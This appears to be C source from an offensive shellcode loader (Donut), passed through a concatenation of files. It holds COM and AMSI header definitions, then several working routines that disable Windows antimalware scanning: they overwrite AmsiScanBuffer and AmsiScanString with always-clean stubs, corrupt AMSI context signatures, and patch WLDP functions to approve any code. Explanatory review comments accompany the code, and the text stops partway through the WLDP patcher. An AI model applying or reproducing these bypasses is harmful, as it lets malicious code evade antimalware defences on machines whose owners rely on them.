// the engine calls back through them, so the slot order (IUnknown's three
// methods, then the eight site methods in this sequence) is the COM ABI and
// must not be changed.
typedef struct _IActiveScriptSiteVtbl {
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IActiveScriptSite * This,
        /* [in] */ REFIID riid,
        /* [annotation][iid_is][out] */
        void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IActiveScriptSite * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IActiveScriptSite * This);

    HRESULT ( STDMETHODCALLTYPE *GetLCID )(
        IActiveScriptSite * This,
        /* [out] */ LCID *plcid);

    HRESULT ( STDMETHODCALLTYPE *GetItemInfo )(
        IActiveScriptSite * This,
        /* [in] */ LPCOLESTR pstrName,
        /* [in] */ DWORD dwReturnMask,
        /* [out] */ IUnknown **ppiunkItem,
        /* [out] */ ITypeInfo **ppti);

    HRESULT ( STDMETHODCALLTYPE *GetDocVersionString )(
        IActiveScriptSite * This,
        /* [out] */ BSTR *pbstrVersion);

    HRESULT ( STDMETHODCALLTYPE *OnScriptTerminate )(
        IActiveScriptSite * This,
        /* [in] */ const VARIANT *pvarResult,
        /* [in] */ const EXCEPINFO *pexcepinfo);

    HRESULT ( STDMETHODCALLTYPE *OnStateChange )(
        IActiveScriptSite * This,
        /* [in] */ SCRIPTSTATE ssScriptState);

    HRESULT ( STDMETHODCALLTYPE *OnScriptError )(
        IActiveScriptSite * This,
        /* [in] */ IActiveScriptError *pscripterror);

    HRESULT ( STDMETHODCALLTYPE *OnEnterScript )(
        IActiveScriptSite * This);

    HRESULT ( STDMETHODCALLTYPE *OnLeaveScript )(
        IActiveScriptSite * This);

    END_INTERFACE
} IActiveScriptSiteVtbl;
390 | ||
// Host-side site object. lpVtbl stays first so the engine sees a normal
// COM interface pointer; the reference count is appended after it and is
// private to this implementation (manipulated with _Interlocked* in
// ActiveScript_AddRef/Release). The struct tag is forward-typedef'd as
// IActiveScriptSite above; ActiveScriptSite names the same type.
typedef struct _IActiveScriptSite {
    IActiveScriptSiteVtbl *lpVtbl;
    ULONG m_cRef; // reference count (not part of original definition of course)
} ActiveScriptSite;
395 | ||
396 | #ifdef _WIN64 | |
397 | #define IActiveScriptParse IActiveScriptParse64 | |
398 | #define IID_IActiveScriptParse IID_IActiveScriptParse64 | |
399 | #else | |
400 | #define IActiveScriptParse IActiveScriptParse32 | |
401 | #define IID_IActiveScriptParse IID_IActiveScriptParse32 | |
402 | #endif | |
403 | ||
404 | static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this); | |
405 | ||
406 | static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv); | |
407 | static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this); | |
408 | static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this); | |
409 | ||
410 | // Informs the host that the scripting engine has begun executing the script code. | |
411 | static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this); | |
412 | ||
413 | // Informs the host that the scripting engine has returned from executing script code. | |
414 | static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this); | |
415 | ||
416 | // Retrieves the locale identifier that the host uses for displaying user-interface elements. | |
417 | static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *lcid); | |
418 | ||
419 | // Retrieves a host-defined string that uniquely identifies the current document version from the host's point of view. | |
420 | static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version); | |
421 | ||
422 | // Informs the host that an execution error occurred while the engine was running the script. | |
423 | static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this, IActiveScriptError *scriptError); | |
424 | ||
425 | // Informs the host that the scripting engine has changed states. | |
426 | static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state); | |
427 | ||
428 | // Obtains information about an item that was added to an engine through a call to the IActiveScript::AddNamedItem method. | |
429 | static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this, LPCOLESTR objectName, DWORD dwReturnMask, IUnknown **objPtr, ITypeInfo **typeInfo); | |
430 | ||
431 | // Called when the script has completed execution. | |
432 | static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this, const VARIANT *pvr, const EXCEPINFO *pei); | |
433 | ||
434 | #endif | |
435 |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef AMSI_H | |
32 | #define AMSI_H | |
33 | ||
34 | #include <windows.h> | |
35 | ||
36 | DECLARE_HANDLE(HAMSICONTEXT); | |
37 | DECLARE_HANDLE(HAMSISESSION); | |
38 | ||
39 | typedef struct _IAmsiStream IAmsiStream; | |
40 | typedef struct _IAntimalware IAntimalware; | |
41 | typedef struct _IAntimalwareProvider IAntimalwareProvider; | |
42 | ||
// Verdict produced by an AMSI scan (the out-parameter of AmsiScanBuffer /
// AmsiScanString and of IAntimalware::Scan below). Everything below
// AMSI_RESULT_DETECTED means "not blocked"; the numeric value in between is a
// provider-specific risk estimate rather than a fixed enumerator.
typedef enum tagAMSI_RESULT {
    // No detection found. Result likely not going to change after future definition update.
    // a.k.a. known good
    AMSI_RESULT_CLEAN = 0,
    // No detection found. Result might change after future definition update.
    AMSI_RESULT_NOT_DETECTED = 1,
    // Detection found. It is recommended to abort executing the content if it is executable, e.g. a script.
    // Return result of 1 - 32767 is estimated risk level that an antimalware provider might indicate.
    // The larger the result, the riskier to continue.
    // Any return result equal to or larger than 32768 is considered malware and should be blocked.
    // These values are provider specific, and may indicate malware family or ID.
    // An application should use AmsiResultIsMalware() to determine whether the content should be blocked.
    AMSI_RESULT_DETECTED = 32768,
} AMSI_RESULT;
57 | ||
// Attribute ids a provider passes to IAmsiStream::GetAttribute (see
// IAmsiStreamVtbl below) to learn about the content it is scanning.
// The comment on each value names the type GetAttribute returns for it.
typedef enum tagAMSI_ATTRIBUTE {
    // Name/version/GUID string of the calling application.
    AMSI_ATTRIBUTE_APP_NAME = 0,
    // LPWSTR, filename, URL, script unique id etc.
    AMSI_ATTRIBUTE_CONTENT_NAME = 1,
    // ULONGLONG, size of the input. Mandatory.
    AMSI_ATTRIBUTE_CONTENT_SIZE = 2,
    // PVOID, memory address if content is fully loaded in memory. Mandatory unless
    // Read() is implemented instead to support on-demand content retrieval.
    AMSI_ATTRIBUTE_CONTENT_ADDRESS = 3,
    // PVOID, session is used to associate different scan calls, e.g. if the contents
    // to be scanned belong to the same original script. Return nullptr if content
    // is self-contained. Mandatory.
    AMSI_ATTRIBUTE_SESSION = 4,
} AMSI_ATTRIBUTE;
73 | ||
// COM vtable for IAmsiStream, the object handed to a provider's Scan().
// Slot order is the binary interface: IUnknown's three methods first, then
// GetAttribute and Read. Do not reorder or insert members.
typedef struct IAmsiStreamVtbl {
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IAmsiStream * This,
        REFIID riid,
        void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IAmsiStream * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IAmsiStream * This);

    // Fetch one AMSI_ATTRIBUTE of the content into `data` (at most `dataSize`
    // bytes); `retData` presumably receives the attribute's length — the
    // behaviour for a too-small buffer is not visible here.
    HRESULT ( STDMETHODCALLTYPE *GetAttribute )(
        IAmsiStream * This,
        AMSI_ATTRIBUTE attribute,
        ULONG dataSize,
        unsigned char *data,
        ULONG *retData);

    // On-demand content retrieval, the alternative to providing
    // AMSI_ATTRIBUTE_CONTENT_ADDRESS: read up to `size` bytes starting at
    // `position` into `buffer`; `readSize` receives the count delivered.
    HRESULT ( STDMETHODCALLTYPE *Read )(
        IAmsiStream * This,
        ULONGLONG position,
        ULONG size,
        unsigned char *buffer,
        ULONG *readSize);

    END_INTERFACE
} IAmsiStreamVtbl;
104 | ||
// Completes the forward-declared IAmsiStream: an instance is nothing but a
// pointer to its vtable. Also reachable under the alias AmsiStream.
typedef struct _IAmsiStream {
    IAmsiStreamVtbl *lpVtbl;
} AmsiStream;
108 | ||
// COM vtable for IAntimalwareProvider (by its name, the interface each
// registered antimalware engine implements). Slot order is the binary
// interface: IUnknown, then Scan, CloseSession, DisplayName.
typedef struct IAntimalwareProviderVtbl {
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IAntimalwareProvider * This,
        REFIID riid,
        void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IAntimalwareProvider * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IAntimalwareProvider * This);

    // Scan `stream` and write the verdict to `result`.
    HRESULT ( STDMETHODCALLTYPE *Scan )(
        IAntimalwareProvider * This,
        IAmsiStream *stream,
        AMSI_RESULT *result);

    // Notification that the scan session identified by `session` is finished.
    void ( STDMETHODCALLTYPE *CloseSession )(
        IAntimalwareProvider * This,
        ULONGLONG session);

    // Out: human-readable provider name. Ownership of the returned string is
    // not visible from this header.
    HRESULT ( STDMETHODCALLTYPE *DisplayName )(
        IAntimalwareProvider * This,
        LPWSTR *displayName);

    END_INTERFACE
} IAntimalwareProviderVtbl;
138 | ||
// Completes the forward-declared IAntimalwareProvider: a bare vtable pointer.
// Also reachable under the alias AntimalwareProvider.
typedef struct _IAntimalwareProvider {
    IAntimalwareProviderVtbl *lpVtbl;
} AntimalwareProvider;
142 | ||
// COM vtable for IAntimalware, the aggregate object stored in the AMSI
// context (see tagHAMSICONTEXT below). Slot order is the binary interface:
// IUnknown, then Scan and CloseSession.
typedef struct IAntimalwareVtbl {
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface)(
        IAntimalware *This,
        REFIID riid,
        void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IAntimalware * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IAntimalware * This);

    // Scan `stream`, writing the verdict to `result` and — presumably — the
    // provider that produced it to `provider`.
    HRESULT ( STDMETHODCALLTYPE *Scan )(
        IAntimalware * This,
        IAmsiStream *stream,
        AMSI_RESULT *result,
        IAntimalwareProvider **provider);

    // Notification that the scan session identified by `session` is finished.
    void ( STDMETHODCALLTYPE *CloseSession )(
        IAntimalware * This,
        ULONGLONG session);

    END_INTERFACE
} IAntimalwareVtbl;
169 | ||
// Completes the forward-declared IAntimalware: a bare vtable pointer.
// Also reachable under the alias Antimalware.
typedef struct _IAntimalware {
    IAntimalwareVtbl *lpVtbl;
} Antimalware;
173 | ||
// Layout behind the opaque HAMSICONTEXT handle. This is amsi.dll's private
// structure, not a documented contract: field order and size may differ
// between Windows builds, so verify against the target build before relying
// on any offset. NOTE(review): the names _HAMSICONTEXT / _PHAMSICONTEXT fall
// in the identifier space reserved for the implementation (leading
// underscore followed by a capital letter).
typedef struct tagHAMSICONTEXT {
    DWORD        Signature;          // "AMSI" or 0x49534D41 (the four ASCII bytes read as a little-endian DWORD)
    PWCHAR       AppName;            // set by AmsiInitialize
    IAntimalware *Antimalware;       // set by AmsiInitialize
    DWORD        SessionCount;       // increased by AmsiOpenSession
} _HAMSICONTEXT, *_PHAMSICONTEXT;
180 | ||
181 | #endif⏎ |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
// Identifies the script/runtime host on whose behalf a WLDP (Windows
// Lockdown Policy) query is made; carried in WLDP_HOST_INFORMATION.dwHostId.
typedef enum _WLDP_HOST_ID {
    WLDP_HOST_ID_UNKNOWN    = 0,
    WLDP_HOST_ID_GLOBAL     = 1,
    WLDP_HOST_ID_VBA        = 2,
    WLDP_HOST_ID_WSH        = 3,
    WLDP_HOST_ID_POWERSHELL = 4,
    WLDP_HOST_ID_IE         = 5,
    WLDP_HOST_ID_MSI        = 6,
    WLDP_HOST_ID_MAX        = 7   // one past the last valid id, not a host
} WLDP_HOST_ID, *PWLDP_HOST_ID;
41 | ||
// Caller description passed to WldpIsClassInApprovedList (see the stub
// below). Field meanings beyond their names are not visible in this file.
typedef struct _WLDP_HOST_INFORMATION {
    DWORD        dwRevision;   // structure revision supplied by the caller
    WLDP_HOST_ID dwHostId;     // which host is asking (see WLDP_HOST_ID)
    PCWSTR       szSource;     // presumably the script/file being evaluated — unverified
    HANDLE       hSource;      // presumably a handle to the same source — unverified
} WLDP_HOST_INFORMATION, *PWLDP_HOST_INFORMATION;
48 | ||
49 | #if defined(BYPASS_AMSI_A) | |
50 | ||
// Replacement body that DisableAMSI (variant A) copies over the entry of
// amsi!AmsiScanBuffer: every input is ignored, the verdict is reported as
// AMSI_RESULT_CLEAN and the call succeeds with S_OK.
//
// The machine code of this function is copied verbatim (Memcpy in
// DisableAMSI), so it has to stay self-contained: a call or a reference to
// global data in its body would be copied into amsi.dll as a now-meaningless
// relative/absolute address. It must also keep the real export's calling
// convention (WINAPI) and parameter list. Its byte length is taken from the
// distance to AmsiScanBufferStubEnd, so changing its shape changes how many
// bytes get written. `result` is dereferenced without a NULL check; the real
// API's handling of a NULL result pointer is not reproduced.
HRESULT WINAPI AmsiScanBufferStub(
  HAMSICONTEXT amsiContext,
  PVOID        buffer,
  ULONG        length,
  LPCWSTR      contentName,
  HAMSISESSION amsiSession,
  AMSI_RESULT  *result)
{
    *result = AMSI_RESULT_CLEAN;
    return S_OK;
}
63 | ||
// Marker only — never called. DisableAMSI subtracts AmsiScanBufferStub's
// address from this one to obtain the number of bytes to copy, which relies
// on the compiler emitting this function directly after the stub; only the
// sign of that difference is checked at run time.
//
// The body performs a multiplication (each marker uses a different operation)
// because MSVC can identify functions that compile to the same code and fold
// the duplicates into one, which would collapse the markers and break the
// length calculation. Null subroutines are eliminated outright.

int AmsiScanBufferStubEnd(int a, int b) {
    return a * b;
}
74 | ||
// Replacement body that DisableAMSI (variant A) copies over the entry of
// amsi!AmsiScanString: inputs are ignored, the verdict is AMSI_RESULT_CLEAN
// and the call returns S_OK. The same constraints as AmsiScanBufferStub
// apply: the bytes are copied verbatim, so the body must stay free of calls
// and global references, keep the WINAPI convention and parameter list, and
// its length is measured against AmsiScanStringStubEnd. `result` is not
// NULL-checked.
HRESULT WINAPI AmsiScanStringStub(
  HAMSICONTEXT amsiContext,
  LPCWSTR      string,
  LPCWSTR      contentName,
  HAMSISESSION amsiSession,
  AMSI_RESULT  *result)
{
    *result = AMSI_RESULT_CLEAN;
    return S_OK;
}
86 | ||
// Marker only — never called; its address minus AmsiScanStringStub's is the
// byte count DisableAMSI copies. Uses addition rather than the multiplication
// in AmsiScanBufferStubEnd so MSVC does not fold the two markers together.
int AmsiScanStringStubEnd(int a, int b) {
    return a + b;
}
90 | ||
// Variant A: overwrite the entry points of amsi!AmsiScanBuffer and
// amsi!AmsiScanString with the always-clean stubs defined above.
//
// Returns TRUE when amsi.dll cannot be loaded (treated as "nothing to patch,
// continue") or when both patches were written; FALSE when an export cannot
// be resolved, a stub length comes out negative, or VirtualProtect refuses
// to make the target writable.
//
// Caveats a reader should know:
//  - The stub length is the distance to the marker function that follows the
//    stub in this translation unit. Only its sign is validated; nothing
//    checks it against the size of the export being overwritten, so a stub
//    larger than the real function would spill into whatever follows it in
//    amsi.dll's .text.
//  - If AmsiScanString cannot be resolved after AmsiScanBuffer was already
//    patched, FALSE is returned with the first patch still in place.
//  - The VirtualProtect that restores the original protection is unchecked.
//  - DPRINT formats `len` (a DWORD) with PRIi32; same width on Windows, but
//    the signedness does not match.
BOOL DisableAMSI(PDONUT_INSTANCE inst) {
    HMODULE dll;
    DWORD len, op, t;
    LPVOID cs;
    
    // try load amsi. if unable, assume DLL doesn't exist
    // and return TRUE to indicate it's okay to continue
    dll = inst->api.LoadLibraryA(inst->amsi.s);
    if(dll == NULL) return TRUE;
    
    // resolve address of AmsiScanBuffer. if not found,
    // return FALSE because it should exist ...
    cs = inst->api.GetProcAddress(dll, inst->amsiScanBuf);
    if(cs == NULL) return FALSE;
    
    // calculate length of stub (assumes the marker follows the stub in memory)
    len = (ULONG_PTR)AmsiScanBufferStubEnd -
          (ULONG_PTR)AmsiScanBufferStub;

    DPRINT("Length of AmsiScanBufferStub is %" PRIi32 " bytes.", len);

    // check for negative length. this would only happen when
    // compiler decides to re-order functions.
    if((int)len < 0) return FALSE;
    
    // make the memory writeable. return FALSE on error
    if(!inst->api.VirtualProtect(
      cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;

    DPRINT("Overwriting AmsiScanBuffer");
    // copy the stub's machine code over the export's entry
    Memcpy(cs, ADR(PCHAR, AmsiScanBufferStub), len);
    // set memory back to original protection (result not checked)
    inst->api.VirtualProtect(cs, len, op, &t);
    
    // resolve address of AmsiScanString. if not found,
    // return FALSE because it should exist ...
    cs = inst->api.GetProcAddress(dll, inst->amsiScanStr);
    if(cs == NULL) return FALSE;
    
    // calculate length of stub (same adjacency assumption as above)
    len = (ULONG_PTR)AmsiScanStringStubEnd -
          (ULONG_PTR)AmsiScanStringStub;

    DPRINT("Length of AmsiScanStringStub is %" PRIi32 " bytes.", len);

    // check for negative length. this would only happen when
    // compiler decides to re-order functions.
    if((int)len < 0) return FALSE;
    
    // make the memory writeable
    if(!inst->api.VirtualProtect(
      cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;

    DPRINT("Overwriting AmsiScanString");
    // copy the stub's machine code over the export's entry
    Memcpy(cs, ADR(PCHAR, AmsiScanStringStub), len);
    // set memory back to original protection (result not checked)
    inst->api.VirtualProtect(cs, len, op, &t);
    
    return TRUE;
}
153 | ||
154 | #elif defined(BYPASS_AMSI_B) | |
155 | ||
// Variant B: walk forward from amsi!AmsiScanBuffer's entry point looking for
// the 32-bit "AMSI" tag and bump it, so that the signature comparison against
// the context no longer matches.
//
// Returns TRUE when amsi.dll cannot be loaded ("nothing to do, continue") or
// once a match has been processed. There is no other way out of the loop.
//
// Caveats a reader should know:
//  - The scan has no upper bound: if the tag never appears, the loop reads
//    past the end of the mapped image and faults.
//  - `*Signature++` post-increments the POINTER, not the DWORD it points to
//    (the dereference is a read whose value is discarded), so the tag is left
//    as it was even though `disabled` is reported TRUE.
//  - VirtualProtect is applied at `cs` (the function's entry), not at
//    `Signature` (the matched address); the two are only on the same page
//    when the match lies within the first page of the function.
//  - The value compared is inst->amsi.w[0], presumably the DLL-name string
//    reinterpreted as a DWORD; that equals 0x49534D41 only if the string is
//    stored as "AMSI" in upper case — verify in the generator.
//  - Neither VirtualProtect result is checked.
BOOL DisableAMSI(PDONUT_INSTANCE inst) {
    HMODULE dll;
    PBYTE cs;
    DWORD i, op, t;
    BOOL disabled = FALSE;
    PDWORD Signature;
    
    // try load amsi. if unable to load, assume
    // it doesn't exist and return TRUE to indicate
    // it's okay to continue.
    dll = inst->api.LoadLibraryA(inst->amsi.s);
    if(dll == NULL) return TRUE;
    
    // resolve address of AmsiScanBuffer. if unable, return
    // FALSE because it should exist.
    cs = (PBYTE)inst->api.GetProcAddress(dll, inst->amsiScanBuf);
    if(cs == NULL) return FALSE;
    
    // scan for signature (unbounded: only a match terminates the loop)
    for(i=0;;i++) {
      Signature = (PDWORD)&cs[i];
      // is it "AMSI"?
      if(*Signature == inst->amsi.w[0]) {
        // set memory protection for write access
        // (note: at cs, not at Signature; result unchecked)
        inst->api.VirtualProtect(cs, sizeof(DWORD), 
          PAGE_EXECUTE_READWRITE, &op);
          
        // intended to change the signature; as written this advances the
        // pointer and leaves the DWORD untouched (see header comment)
        *Signature++;
        
        // set memory back to original protection (result unchecked)
        inst->api.VirtualProtect(cs, sizeof(DWORD), op, &t);
        disabled = TRUE;
        break;
      }
    }
    return disabled;
}
194 | ||
195 | #elif defined(BYPASS_AMSI_C) | |
196 | ||
// Variant C: locate the AMSI context that the CLR keeps in one of clr.dll's
// writable sections and corrupt its "AMSI" signature. Based on an idea by
// Matt Graeber:
// https://gist.github.com/mattifestation/ef0132ba4ae3cc136914da32a88106b9
// (The context could also be found by scanning PEB.ProcessHeap.)
//
// Returns FALSE when clr.dll is not loaded in the process — note that the
// other variants return TRUE when their target DLL is absent, so the
// "nothing to do" case is signalled differently here — FALSE when no
// matching pointer is found, and TRUE once a signature has been corrupted.
//
// Caveats a reader should know:
//  - Every pointer-sized value in every writable section is treated as a
//    candidate and passed to VirtualQuery; only values that land in
//    committed, private, PAGE_READWRITE memory are dereferenced (4 bytes at
//    the pointer itself), so the read is safe but the search costs one
//    VirtualQuery per candidate.
//  - `sh[i].Misc.VirtualSize - sizeof(ULONG_PTR)` is unsigned arithmetic: a
//    writable section smaller than one pointer would wrap the bound and the
//    scan would run past the end of that section.
//  - Section headers are trusted as-is (VirtualAddress / VirtualSize are not
//    checked against the image size).

BOOL DisableAMSI(PDONUT_INSTANCE inst) {
    LPVOID                   clr;
    BOOL                     disabled = FALSE;
    PIMAGE_DOS_HEADER        dos;
    PIMAGE_NT_HEADERS        nt;
    PIMAGE_SECTION_HEADER    sh;
    DWORD                    i, j, res;
    PBYTE                    ds;
    MEMORY_BASIC_INFORMATION mbi;
    _PHAMSICONTEXT           ctx;
    
    // get address of CLR.dll. if unable, this
    // probably isn't a dotnet assembly being loaded
    clr = inst->api.GetModuleHandleA(inst->clr);
    if(clr == NULL) return FALSE;
    
    dos = (PIMAGE_DOS_HEADER)clr;  
    nt  = RVA2VA(PIMAGE_NT_HEADERS, clr, dos->e_lfanew);  
    sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
      nt->FileHeader.SizeOfOptionalHeader);
             
    // scan all writeable segments while disabled == FALSE
    for(i = 0; 
        i < nt->FileHeader.NumberOfSections && !disabled; 
        i++) 
    {
      // if this section is writeable, assume it's data
      if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) {
        // scan section for pointers to the heap
        ds = RVA2VA (PBYTE, clr, sh[i].VirtualAddress);
        
        // NOTE(review): unsigned bound — wraps if VirtualSize < sizeof(ULONG_PTR)
        for(j = 0; 
            j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR); 
            j += sizeof(ULONG_PTR)) 
        {
          // get pointer-sized value at this slot (it may not be a pointer at all)
          ULONG_PTR ptr = *(ULONG_PTR*)&ds[j];
          // query the memory it would point to; VirtualQuery fails for
          // values that are not mapped addresses
          res = inst->api.VirtualQuery((LPVOID)ptr, &mbi, sizeof(mbi));
          if(res != sizeof(mbi)) continue;
          
          // only follow it into committed, private, read-write memory
          // (heap or stack)
          if ((mbi.State   == MEM_COMMIT    ) &&
              (mbi.Type    == MEM_PRIVATE   ) && 
              (mbi.Protect == PAGE_READWRITE))
          {
            ctx = (_PHAMSICONTEXT)ptr;
            // check if it contains the signature
            if(ctx->Signature == inst->amsi.w[0]) {
              // corrupt it
              ctx->Signature++;
              disabled = TRUE;
              break;
            }
          }
        }
      }
    }
    return disabled;
}
262 | ||
263 | #elif defined(BYPASS_AMSI_D) | |
264 | // This is where you may define your own AMSI bypass. | |
// To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_AMSI_D defined.
266 | ||
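// Variant D: template slot for a user-supplied AMSI bypass (build with
// BYPASS_AMSI_D defined). Nothing is implemented here, so the function
// fails closed: FALSE tells the caller that no bypass took place.
//
// Fix: the previous body was empty, which falls off the end of a BOOL
// function — undefined behaviour that left the caller reading whatever
// happened to be in the return register.
//
// inst: the loader instance (unused until a bypass is written here).
// Returns FALSE always.
BOOL DisableAMSI(PDONUT_INSTANCE inst) {
    (void)inst;
    return FALSE;
}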
270 | ||
271 | #endif | |
272 | ||
273 | #if defined(BYPASS_WLDP_A) | |
274 | ||
// Replacement body that DisableWLDP (variant A) copies over the entry of
// wldp!WldpIsClassInApprovedList: inputs are ignored, `*isApproved` is set
// to TRUE and the call returns S_OK. Its bytes are copied verbatim, so the
// body must stay free of calls and global references, keep the WINAPI
// convention and parameter list, and its length is measured against
// WldpIsClassInApprovedListStubEnd. `isApproved` is not NULL-checked.
HRESULT WINAPI WldpIsClassInApprovedListStub(
    REFCLSID               classID,
    PWLDP_HOST_INFORMATION hostInformation,
    PBOOL                  isApproved,
    DWORD                  optionalFlags)
{
    *isApproved = TRUE;
    return S_OK;
}
285 | ||
// Marker only — never called; its address minus WldpIsClassInApprovedListStub's
// is the byte count DisableWLDP copies. Uses subtraction so that its code
// differs from the other markers and MSVC does not fold identical functions
// into one (which would break the length calculation).
int WldpIsClassInApprovedListStubEnd(int a, int b) {
    return a - b;
}
291 | ||
// Replacement body that DisableWLDP (variant A) copies over the entry of
// wldp!WldpQueryDynamicCodeTrust: every input is ignored and the call
// reports success (S_OK). Same constraints as the other stubs: copied
// verbatim, so no calls or global references, WINAPI convention and
// parameter list preserved, length measured against
// WldpQueryDynamicCodeTrustStubEnd.
HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
    HANDLE fileHandle,
    PVOID  baseImage,
    ULONG  ImageSize)
{
    return S_OK;
}
300 | ||
// Marker only — never called; its address minus
// WldpQueryDynamicCodeTrustStub's is the byte count DisableWLDP copies.
// Uses division so its code differs from the other markers (MSVC folding).
// The division by zero that b == 0 would cause is irrelevant because the
// function is never invoked.
int WldpQueryDynamicCodeTrustStubEnd(int a, int b) {
    return a / b;
}
304 | ||
// Variant A: overwrite the entry points of wldp!WldpQueryDynamicCodeTrust and
// wldp!WldpIsClassInApprovedList with the always-approve stubs above.
//
// Returns TRUE when wldp.dll cannot be loaded (treated as "nothing to patch,
// continue") or when both patches were written; FALSE when an export cannot
// be resolved, a stub length comes out negative, or VirtualProtect refuses
// to make the target writable.
//
// Same caveats as the AMSI variant A patcher: each stub length is the
// distance to the marker function that follows the stub, only its sign is
// validated and nothing checks it against the size of the export being
// overwritten; an early FALSE after the first patch leaves that patch in
// place; the VirtualProtect that restores the original protection is
// unchecked; DPRINT formats a DWORD with PRIi32.
BOOL DisableWLDP(PDONUT_INSTANCE inst) {
    HMODULE wldp;
    DWORD len, op, t;
    LPVOID cs;
    
    // try load wldp. if unable, assume DLL doesn't exist
    // and return TRUE to indicate it's okay to continue
    wldp = inst->api.LoadLibraryA(inst->wldp);
    if(wldp == NULL) return TRUE;
    
    // resolve address of WldpQueryDynamicCodeTrust
    // if not found, return FALSE because it should exist
